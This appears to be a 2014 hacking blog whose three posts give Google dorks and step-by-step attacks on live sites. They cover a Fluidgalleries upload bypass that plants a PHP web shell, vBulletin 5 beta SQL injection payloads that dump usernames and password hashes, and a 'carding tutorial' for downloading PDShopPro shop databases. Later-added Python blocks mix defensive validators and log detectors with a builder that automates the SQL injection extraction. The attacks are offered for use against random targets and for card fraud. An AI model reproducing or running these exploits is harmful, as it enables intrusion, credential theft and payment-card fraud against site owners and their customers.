Monday, 30 June 2014

Fluidgalleries Photo Upload - Remote File Upload Vulnerability

Dorks:
inurl:"fluidgalleries/dat/info.dat"
inurl:"/fluidgalleries/php/"
Exploit:
http://localhost/[path]/fluidgalleries/php/photo-upload.php
*Use Firefox with the Live HTTP Headers add-on, which lets you edit and replay the captured upload request. Then open the upload page above.

1. Click the Choose File button and select a file named shell.php.jpg (the .jpg suffix gets it past the uploader's extension check).

2. Click the Upload button.

3. In Live HTTP Headers, take the captured upload request, change the filename in it from shell.php.jpg to shell.php, and replay it. The server keeps the extension it is given, so the file is now stored as PHP.

4. The uploaded file lands in the photos directory with a random number prefixed to its name:
http://localhost/[path]/fluidgalleries/photos/[random number]shell.php

Example: 1NEXUS.php

Video proof of the exploit:
http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf
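
What a server-side check for this upload path looks like, as an added example (this is not Fluidgalleries code; the allowed extension list, the photos/ target directory and the function names are assumptions): it rejects shell.php and shell.php.jpg alike, checks that the bytes really are an image, and picks the stored filename itself, so the filename edited in Live HTTP Headers never reaches disk.

```python
import os
import secrets

# Added example: hardened server-side checks for an image-gallery upload handler.
# Not Fluidgalleries code. Extension lists and the photos/ directory are assumptions.

ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                  "asp", "aspx", "jsp", "cgi", "pl", "py", "sh", "htaccess"}

# Leading bytes (magic numbers) of the image formats we accept.
IMAGE_MAGIC = (
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)


class UploadRejected(ValueError):
    """Raised for any upload that fails a server-side check."""


def sniff_image_type(data: bytes):
    """Return 'jpg'/'png'/'gif' from the file's own bytes, or None if it is none of them."""
    for magic, kind in IMAGE_MAGIC:
        if data.startswith(magic):
            return kind
    return None


def validate_upload(client_filename: str, data: bytes) -> str:
    """Validate an upload and return the name the server will store it under.

    The client filename is consulted only for its extension; it never becomes part of
    the stored path, so editing the multipart filename in transit gains nothing.
    """
    # Strip any directory component the client sent (Windows or POSIX separators).
    base = os.path.basename(client_filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[-1]:
        raise UploadRejected("missing extension")
    extensions = parts[1:]
    # shell.php and shell.php.jpg are both caught here: an executable extension anywhere in the name.
    if EXECUTABLE_EXT.intersection(extensions):
        raise UploadRejected("executable extension in filename")
    ext = "jpg" if extensions[-1] == "jpeg" else extensions[-1]
    if ext not in ALLOWED_IMAGE_EXT:
        raise UploadRejected(f"extension .{ext} not allowed")
    # The content must really be the image type the extension claims.
    if sniff_image_type(data) != ext:
        raise UploadRejected("file content does not match extension")
    # Server-chosen random name: nothing from the client survives into photos/.
    return f"{secrets.token_hex(8)}.{ext}"


def is_rejected(client_filename: str, data: bytes) -> bool:
    """True when validate_upload refuses the file (useful for tests and for logging attempts)."""
    try:
        validate_upload(client_filename, data)
    except UploadRejected:
        return True
    return False


def store_upload(client_filename: str, data: bytes, photos_dir: str) -> str:
    """Validate, then write under the server-chosen name; returns the stored path. Assumes photos_dir exists."""
    path = os.path.join(photos_dir, validate_upload(client_filename, data))
    with open(path, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    fake_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32   # constructed JPEG header, not a real photo
    print("stored as", validate_upload("holiday.JPG", fake_jpeg))
    for name, body in (("shell.php", b"<?php system($_GET['c']); ?>"),
                       ("shell.php.jpg", fake_jpeg),
                       ("shell.jpg", b"<?php system($_GET['c']); ?>")):
        print(name, "rejected" if is_rejected(name, body) else "accepted")
```

Serving the photos directory with script execution disabled (no PHP handler for that path) is the second half of the fix; the validator above only keeps the file from being stored as PHP in the first place.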

Saturday, 28 June 2014

vBulletin 5.0.0 (all Beta releases) SQL Injection Exploit 0day

Dork:
Powered by vBulletin™ Version 5.0.0 Beta
Tools needed:
Firefox + the Live HTTP Headers add-on
1. Pick any forum running it. Create an account and activate it.

2. Find any post. An admin's post is the best choice.

3. Open Live HTTP Headers, then click "Like" on the post.

4. In the captured request, open the POST content and append the query below directly after "noteid=<number>", then replay it. The injected value comes back inside a MySQL "Duplicate entry" error, which is how the data is read out.

Query:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*The query above pulls one record (username and password) from the user table. Note the offset: LIMIT 1,1 returns the second row; use LIMIT 0,1 for the first.

*The password comes back as a salted hash, not encrypted text, so pull the salt as well (same technique, different column) and crack it offline. Cracking is not covered here.

Other SQLi syntaxes (each goes in the same place after noteid=; replace 0xHEXCODEOFDATABASE / 0xhex_code_of_... with the name as a MySQL hex literal, e.g. 0x7662 for "vb", and step N from 0 upward to walk through the rows):
Version():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

User():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Database():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Database Print (Nth schema name):
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Table Count:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Print Tables (Nth table name):
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Column Count of a Selected Table:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Fetch Data (two columns of any table, Nth row):
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
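
All of the payloads above are one wrapper around different inner SELECTs. As an added example that is not part of the post, here is that wrapper as a set of Python functions together with a parser for the MySQL "Duplicate entry" error that carries the value back: the hex literal for a database name replaces the 0xHEXCODEOFDATABASE placeholder, N is the 0-based row offset, and the user/username/password names are the post's own. The error text in the sample is constructed, not a captured response.

```python
import re
from typing import Optional, Tuple

# Added example, not the post's code: build the error-based payloads from one template and
# pull the leaked value back out of the MySQL error text.

# The post's wrapper. rand(0) is seeded, so floor(rand(0)*2) yields a fixed sequence (0,1,1,0,1,1,...);
# GROUP BY x then meets a key it already inserted and MySQL raises
# "Duplicate entry '<x>' for key 'group_key'", where <x> carries the inner SELECT's value.
WRAPPER = (
    ") and(select 1 from(select count(*),concat((select (select ({inner})) "
    "from information_schema.tables limit 0,1),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a) AND (1338=1338"
)
# concat(0x7e,0x27,...,0x27,0x7e) frames the value as ~'value'~ ; the trailing digit is floor(rand(0)*2).
DUPLICATE_RE = re.compile(r"Duplicate entry '~'(?P<value>.*)'~[01]' for key")


def hex_literal(s: str) -> str:
    """MySQL 0x... literal for a string; stands in for 0xHEXCODEOFDATABASE so no quotes are needed."""
    return "0x" + s.encode("utf-8").hex()


def wrap(inner_select: str) -> str:
    return WRAPPER.format(inner=inner_select)


def table_count_payload(db: str) -> str:
    return wrap(f"SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) "
                f"FROM information_schema.tables WHERE table_schema={hex_literal(db)}")


def table_name_payload(db: str, n: int) -> str:
    """Nth table of db (0-based); step n upward until no value comes back."""
    return wrap(f"SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) "
                f"FROM information_schema.tables WHERE table_schema={hex_literal(db)} LIMIT {n},1")


def row_payload(table: str, col1: str, col2: str, n: int) -> str:
    """Nth row (0-based) of two columns, framed as ~'col1'~col2'~ ; LIMIT 0,1 is the first row."""
    return wrap(f"SELECT concat(0x7e,0x27,{col1},0x27,0x7e,{col2},0x27,0x7e) "
                f"FROM {table} LIMIT {n},1")


def extract_value(response_text: str) -> Optional[str]:
    """The leaked value from a response that echoes the MySQL error, or None if nothing leaked."""
    m = DUPLICATE_RE.search(response_text)
    return m.group("value") if m else None


def split_pair(value: str) -> Tuple[str, str]:
    """Undo the col1'~col2 framing produced by row_payload."""
    a, _, b = value.partition("'~")
    return a, b


if __name__ == "__main__":
    print(table_name_payload("vbulletin", 0))
    print(row_payload("user", "username", "password", 0))
    # Constructed error text of the kind an endpoint might echo; not a real vBulletin response.
    sample = ("Database error: Duplicate entry "
              "'~'admin'~5f4dcc3b5aa765d61d8327deb882cf99'~1' for key 'group_key'")
    print(split_pair(extract_value(sample)))
```

The same regex doubles as a detection signature on the defending side: a `Duplicate entry '~'` string in an application error log, or `floor(rand(0)*2)` in a request body, is this technique and nothing legitimate.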

NEXUS 

Thursday, 26 June 2014

Carding Tutorial - PDShopPro Shopping Cart

Dork:
allinurl:/shop/category.asp?catid=

Steps:
1- Copy and paste the dork into Google.
2- Choose any site from the results.
3- For example, your site is
www.example.com/shop/category.asp?catid=2
4- Remove /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp. You will see something like this:

5- If you get a page like that, the site is vulnerable: the setup page is reachable without logging in.
6- Next, replace /admin/dbsetup.asp with /data/pdshoppro.mdb.
7- You will be prompted to open or save the file. The cart keeps its whole database in this Access file inside the web root, and the server hands it out as a plain download.
8- Save the file and open it with Microsoft Access or any other .mdb reader (it is an Access database, not a spreadsheet).
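
For the other side of this, an added example that is not part of the post: detection over IIS W3C logs of the request sequence used above, telling a probe for dbsetup.asp apart from an actual download of pdshoppro.mdb. The log field order, the IPs and the sample lines are constructed assumptions; adjust LOG_RE to the field list your server actually writes.

```python
import re
from typing import Dict, Iterable

# Added example (not from the original post): flag this walkthrough's request pattern in IIS
# W3C logs. The field order is an assumption set in IIS logging options.
SETUP_PAGE = "/admin/dbsetup.asp"
DB_FILE = "/data/pdshoppro.mdb"

# Assumed fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status sc-bytes
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3}) (?P<bytes>\d+)$"
)


def parse_line(line: str):
    """One log record as a dict, or None for #Fields:/#Software: headers and malformed lines."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_db_exposure(lines: Iterable[str]) -> Dict[str, dict]:
    """Per client IP: did it request the setup page, and did the .mdb actually come back (200 with a body)?"""
    findings: Dict[str, dict] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        stem = rec["stem"].lower()
        f = findings.setdefault(rec["ip"], {"probed_setup": False, "mdb_served": False, "mdb_bytes": 0})
        if stem == SETUP_PAGE:
            f["probed_setup"] = True          # any status counts: a 404 is still a probe
        elif stem == DB_FILE and rec["status"] == "200" and int(rec["bytes"]) > 0:
            f["mdb_served"] = True            # the database file left the server
            f["mdb_bytes"] += int(rec["bytes"])
    return {ip: f for ip, f in findings.items() if f["probed_setup"] or f["mdb_served"]}


# Constructed sample log; the IPs are documentation ranges, not real clients.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status sc-bytes
2014-06-26 10:01:02 198.51.100.4 GET /shop/category.asp catid=3 200 8120
2014-06-26 10:02:15 203.0.113.7 GET /shop/category.asp catid=2 200 8120
2014-06-26 10:02:40 203.0.113.7 GET /admin/dbsetup.asp - 200 2311
2014-06-26 10:03:05 203.0.113.7 GET /data/pdshoppro.mdb - 200 1048576
2014-06-26 11:17:51 192.0.2.9 GET /admin/dbsetup.asp - 404 1420
2014-06-26 11:17:52 192.0.2.9 GET /data/pdshoppro.mdb - 404 1420
"""

if __name__ == "__main__":
    for ip, f in find_db_exposure(SAMPLE_LOG.splitlines()).items():
        print(ip, f)
```

The fix on the server is the obvious one: move the .mdb out of the web root (or deny serving *.mdb and the admin/ path to anonymous clients), after which the second client above is all you should ever see.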

 


Watch the Video